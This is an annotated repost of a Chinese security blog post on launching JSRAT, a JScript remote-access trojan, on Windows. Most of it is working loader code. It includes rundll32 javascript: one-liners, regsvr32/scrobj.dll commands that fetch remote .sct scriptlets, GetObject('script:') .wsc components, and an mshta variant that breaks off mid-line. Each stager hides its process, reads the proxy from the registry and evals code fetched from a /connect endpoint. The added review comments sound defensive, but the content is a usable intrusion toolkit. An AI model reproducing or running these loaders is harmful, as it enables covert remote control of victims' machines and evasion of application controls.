1.默认方式（rundll32 直接加载 javascript: 载荷，从 /connect 取回脚本后 eval 执行）
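:: Section 1 loader: rundll32.exe runs inline JScript through mshtml's RunHTMLApplication export,
:: does a synchronous GET to http://127.0.0.1:8081/connect and eval()s whatever comes back.
:: Listing re-joined onto one line: the page copy was wrapped, had lost the "(" after h.Open and
:: had "Shel l" / "ta skkill" split by extraction; the trailing "%" is presumably a terminal
:: artifact (the same script embedded in JSRAT.sct / JSRAT.wsc ends at the closing brace).
:: %20 is used wherever a space would fall outside a quoted region, since the text travels as a
:: javascript: URL on the rundll32 command line.
:: Review caveats:
::  - eval(b) runs the response body verbatim over plaintext HTTP with no authentication or
::    integrity check: whoever controls the /connect host, or the path to it, controls this process.
::    Keep it on loopback / an isolated lab network.
::  - the catch branch runs "taskkill /f /im rundll32.exe", which terminates EVERY rundll32.exe on
::    the host, not only this instance.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}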
2.Use SCT
运行计算器:
:: Fetch calc.sct over HTTP and hand it to scrobj.dll's DllInstall entry point.
:: Per the documented regsvr32 usage: /s = silent, /u = unregister (DllInstall is invoked as an
:: uninstall), /i:<cmdline> = the argument passed to DllInstall, here the scriptlet URL.
:: The script inside <registration> still executes on the unregister path (that is the point of
:: /u: nothing needs to be registered for the code to run); the scriptlet's public Exec() method
:: is NOT called by this command.
:: Review note: regsvr32 + scrobj.dll with a remote /i: target is a widely signatured
:: signed-binary proxy-execution pattern; expect application-control / EDR tooling to log or
:: block it outside a lab.
regsvr32 /u /s /i:http://urlto/calc.sct scrobj.dll
calc.sct:
<?XML version="1.0"?>
<scriptlet>
  <!-- calc.sct: COM scriptlet loaded via scrobj.dll, e.g. regsvr32 /s /i:<path-or-URL> scrobj.dll
       Two scripts live in this file. The one inside <registration> runs when the scriptlet is
       registered or unregistered; the one behind the public Exec() method runs only if a client
       instantiates the object and calls Exec().
       The documented regsvr32 form is /i:<cmdline>; the colon-less /i"C:\..." spelling in the
       original PoC comment is kept verbatim below, but the /i: form is the one to rely on.
       Proof Of Concept - Casey Smith @subTee -->
  <registration
    progid="Empire"
    classid="{20001111-0000-0000-0000-0000FEEDACDC}"
    description="Empire"
    version="1.00">
    <!-- regsvr32 /s /i"C:\Bypass\Backdoor.sct" scrobj.dll -->
    <!-- regsvr32 /s /i:http://server/Backdoor.sct scrobj.dll -->
    <!-- That should work over a proxy and SSL/TLS... -->
    <script language="JScript">
<![CDATA[
      // Registration-time script: launching calc.exe is the proof that code executed.
      var shell = new ActiveXObject("WScript.Shell");
      shell.Run("calc.exe");
]]>
    </script>
  </registration>
  <public>
    <method name="Exec"></method>
  </public>
  <script language="JScript">
<![CDATA[
    // Exposed COM method: spawns cmd.exe when a caller invokes Exec() on the object.
    function Exec() {
      var shell = new ActiveXObject("WScript.Shell");
      shell.Run("cmd.exe");
    }
]]>
  </script>
</scriptlet>
运行JSRAT:
:: Same scrobj.dll loader, pointed at JSRAT.sct. Per the documented regsvr32 usage: /s = silent,
:: /n = do not call DllRegisterServer (only DllInstall, which receives the /i: argument, runs),
:: /u = invoke it as an uninstall, /i:<URL> = the scriptlet to fetch.
:: The <registration> script in JSRAT.sct executes during this call and spawns the hidden
:: rundll32 stager; the unregister path is used so that no registration is left behind.
:: Review note: same widely signatured regsvr32/scrobj.dll pattern as section 2's first command.
regsvr32 /s /n /u /i:http://urlto/JSRAT.sct scrobj.dll
JSRAT.sct
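<?XML version="1.0"?>
<scriptlet>
  <!-- JSRAT.sct: scriptlet stage, loaded with
         regsvr32 /s /n /u /i:http://urlto/JSRAT.sct scrobj.dll
       The script inside <registration> runs during that call and starts a hidden rundll32.exe
       that fetches JScript from the /connect endpoint and eval()s it.
       Listing fix: the "rat" string literal below is ONE line. The copy on the page was wrapped
       mid-token (inside the registry path, inside "taskkill /f /im"), which is a syntax error in
       JScript; nothing else was changed.
       Learn from Casey Smith @subTee -->
  <registration
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <script language="JScript">
<![CDATA[
      // Escaping: \" is a quote in the rundll32 command line; \\\\ becomes \\ there, which the
      // inner JScript string literal reads as one backslash. %20 stands in for every space that
      // would fall outside a quoted region of the javascript: URL.
      // What the inner script does, in order:
      //  1. Reads HKCU\...\Internet Settings\ProxyServer and keeps the text after the first "="
      //     up to the next ";" -- i.e. it assumes the per-protocol form "http=host:port;https=...".
      //     A plain "host:port" value has no "=", so [1] is undefined, .split throws, and the empty
      //     catch silently leaves the request un-proxied. (Review: documented here, not changed.)
      //  2. h.SetProxy(2, q): 2 = HTTPREQUEST_PROXYSETTING_PROXY per the WinHttpRequest docs.
      //  3. Synchronous GET of http://127.0.0.1/connect, then eval() of the response body.
      //     CAVEAT: plaintext HTTP, no authentication or integrity check. Whoever controls that
      //     host, or the network path to it, gets code execution inside this rundll32.
      //     Keep the endpoint on loopback / an isolated lab network.
      //  4. On any error: "taskkill /f /im rundll32.exe", which terminates EVERY rundll32.exe on
      //     the host, not only this one.
      rat="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");w=new%20ActiveXObject(\"WScript.Shell\");try{v=w.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet%20Settings\\\\ProxyServer\");q=v.split(\"=\")[1].split(\";\")[0];h.SetProxy(2,q);}catch(e){}h.Open(\"GET\",\"http://127.0.0.1/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}";
      // Run(cmd, 0, true): window style 0 = hidden, bWaitOnReturn = true, so the regsvr32 process
      // that loaded this scriptlet blocks until that rundll32 exits.
      new ActiveXObject("WScript.Shell").Run(rat,0,true);
]]>
    </script>
  </registration>
</scriptlet>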
3.Use WSC
运行计算器
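:: Section 3, calc variant: rundll32 runs inline JScript whose GetObject() binds the "script:"
:: moniker, which downloads calc.wsc and instantiates the component (the loader is just this
:: GetObject call, so the component's script evidently runs on instantiation).
:: Listing re-joined onto one line; the page copy had "GetObject" and "script:" split mid-word.
:: Review note: rundll32 + javascript: is a widely signatured proxy-execution pattern; expect it to
:: be logged or blocked outside a lab.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://urlto/calc.wsc")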
calc.wsc
<?xml version="1.0"?>
<package>
  <!-- calc.wsc: Windows Script Component fetched through the "script:" moniker, e.g.
         GetObject("script:http://urlto/calc.wsc")
       from rundll32 or mshta. The page's loader is that single GetObject call, so the component
       script evidently executes as soon as the component is instantiated. -->
  <component id="testCalc">
    <script language="JScript">
<![CDATA[
      // Proof of execution: launch the calculator through WScript.Shell.
      var shell = new ActiveXObject("WScript.Shell");
      shell.Run("calc.exe");
]]>
    </script>
  </component>
</package>
运行JSRAT
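:: Section 3, JSRAT variant: same rundll32 + GetObject("script:...") loader, but the component
:: script in JSRAT.wsc spawns a second, hidden rundll32.exe that polls /connect and eval()s the
:: response (see the caveats in JSRAT.wsc: plaintext HTTP, unauthenticated eval, collateral
:: taskkill of every rundll32.exe on failure).
:: Listing re-joined onto one line; the page copy broke it between "GetObject" and "(".
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://urlto/JSRAT.wsc")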
JSRAT.wsc:
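<?xml version="1.0"?>
<package>
  <!-- JSRAT.wsc: Windows Script Component stage, loaded with
         GetObject("script:http://urlto/JSRAT.wsc")
       from the rundll32 one-liner in section 3. On instantiation it starts a hidden rundll32.exe
       that fetches JScript from the /connect endpoint and eval()s it (same stager as JSRAT.sct).
       Listing fix: the "rat" string literal below is ONE line. The copy on the page was wrapped
       mid-token (inside "document.write()", "WScript.Shell", the registry path, "h.ResponseText"
       and between "cmd /c" and "taskkill"), which is a syntax error in JScript; nothing else
       was changed. The component id "testCalc" is carried over from calc.wsc; the loader shown
       on this page does not reference it. -->
  <component id="testCalc">
    <script language="JScript">
<![CDATA[
      // Escaping: \" is a quote in the rundll32 command line; \\\\ becomes \\ there, which the
      // inner JScript string literal reads as one backslash. %20 stands in for every space that
      // would fall outside a quoted region of the javascript: URL.
      // What the inner script does, in order:
      //  1. Reads HKCU\...\Internet Settings\ProxyServer and keeps the text after the first "="
      //     up to the next ";" -- i.e. it assumes the per-protocol form "http=host:port;https=...".
      //     A plain "host:port" value has no "=", so [1] is undefined, .split throws, and the empty
      //     catch silently leaves the request un-proxied. (Review: documented here, not changed.)
      //  2. h.SetProxy(2, q): 2 = HTTPREQUEST_PROXYSETTING_PROXY per the WinHttpRequest docs.
      //  3. Synchronous GET of http://127.0.0.1/connect, then eval() of the response body.
      //     CAVEAT: plaintext HTTP, no authentication or integrity check. Whoever controls that
      //     host, or the network path to it, gets code execution inside this rundll32.
      //     Keep the endpoint on loopback / an isolated lab network.
      //  4. On any error: "taskkill /f /im rundll32.exe", which terminates EVERY rundll32.exe on
      //     the host, not only this one.
      rat="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");w=new%20ActiveXObject(\"WScript.Shell\");try{v=w.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet%20Settings\\\\ProxyServer\");q=v.split(\"=\")[1].split(\";\")[0];h.SetProxy(2,q);}catch(e){}h.Open(\"GET\",\"http://127.0.0.1/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}";
      // Run(cmd, 0, true): window style 0 = hidden, bWaitOnReturn = true, so the process that
      // instantiated this component blocks until that rundll32 exits.
      new ActiveXObject("WScript.Shell").Run(rat,0,true);
]]>
    </script>
  </component>
</package>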
4.Use MSHTA
:: Section 4: mshta.exe accepts the same javascript: payload as the rundll32 one-liner in section 1.
:: The line below is truncated in the source page at "ActiveXOb"; it presumably continues with the
:: same h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1") ... eval(b) ... body shown in section 1,
:: with the same caveats (unauthenticated eval over plaintext HTTP, taskkill of every rundll32.exe
:: on failure). Do not run a partial line; take the full body from section 1.
:: Review note: mshta with an inline javascript: argument is a widely signatured proxy-execution
:: pattern, like the rundll32 and regsvr32 variants above.
mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXOb
文章出处:Evi1cg's blog
原文链接:
https://evi1cg.me/archives/Run_JSRAT.html